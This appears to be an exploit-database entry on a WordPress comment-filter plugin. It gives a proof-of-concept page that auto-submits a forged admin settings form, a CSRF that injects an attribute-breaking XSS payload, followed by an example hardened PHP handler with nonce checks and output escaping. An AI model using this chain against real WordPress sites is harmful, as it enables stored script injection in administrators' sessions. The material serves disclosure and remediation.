## https://sploitus.com/exploit?id=WPEX-ID:9C1C6D61-5588-4C21-95F6-2818C4F5C355
Make an admin open an HTML file containing the following:

```html
<form action="https://example.com/wp-admin/plugins.php?page=abg_commentsafe" method="POST">
    <input type="text" name="abg_commentsafe_tags" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="abg_commentsafe_behaviour" value="strip">
    <input type="text" name="submit" value="Update Tags">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>
```
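
The form above carries no anti-CSRF token, and its `abg_commentsafe_tags` value breaks out of an HTML attribute, so the two controls that matter are a nonce check on save and attribute escaping on output. The following is an added example of a hardened settings handler, not the plugin's own code: the function names, nonce names and option names are assumptions, and it runs inside a WordPress admin context using WordPress core functions.

```php
<?php
// Added example: hypothetical handler, not the plugin's actual code.
// Assumes a WordPress admin context; all called functions are WordPress core APIs.

const ABG_NONCE_ACTION = 'abg_commentsafe_update'; // assumed nonce action name
const ABG_NONCE_FIELD  = 'abg_commentsafe_nonce';  // assumed nonce field name

function abg_commentsafe_save_settings() {
    if ( ! isset( $_POST['submit'] ) ) {
        return;
    }
    // Only administrators may change the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF check: terminates the request unless the POST carries a valid
    // nonce for this action, which a cross-site auto-submitted form cannot supply.
    check_admin_referer( ABG_NONCE_ACTION, ABG_NONCE_FIELD );

    // Input handling: strip markup from the tag list before storing it.
    $tags = isset( $_POST['abg_commentsafe_tags'] )
        ? sanitize_text_field( wp_unslash( $_POST['abg_commentsafe_tags'] ) )
        : '';
    $behaviour = isset( $_POST['abg_commentsafe_behaviour'] )
        ? sanitize_key( wp_unslash( $_POST['abg_commentsafe_behaviour'] ) )
        : '';

    // Allowlist: 'strip' is the only value shown on this page; add the
    // plugin's other valid modes here.
    $allowed = array( 'strip' );
    if ( ! in_array( $behaviour, $allowed, true ) ) {
        $behaviour = 'strip';
    }
    update_option( 'abg_commentsafe_tags', $tags );           // assumed option name
    update_option( 'abg_commentsafe_behaviour', $behaviour ); // assumed option name
}

function abg_commentsafe_render_form() {
    $tags = get_option( 'abg_commentsafe_tags', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( ABG_NONCE_ACTION, ABG_NONCE_FIELD ); ?>
        <!-- esc_attr() encodes quotes and angle brackets, so a stored value
             cannot close the attribute and inject markup. -->
        <input type="text" name="abg_commentsafe_tags" value="<?php echo esc_attr( $tags ); ?>">
        <input type="hidden" name="abg_commentsafe_behaviour" value="strip">
        <input type="submit" name="submit" value="Update Tags">
    </form>
    <?php
}
```

Escaping on output is applied even though input is sanitized, so values already stored before the fix are rendered inert as well.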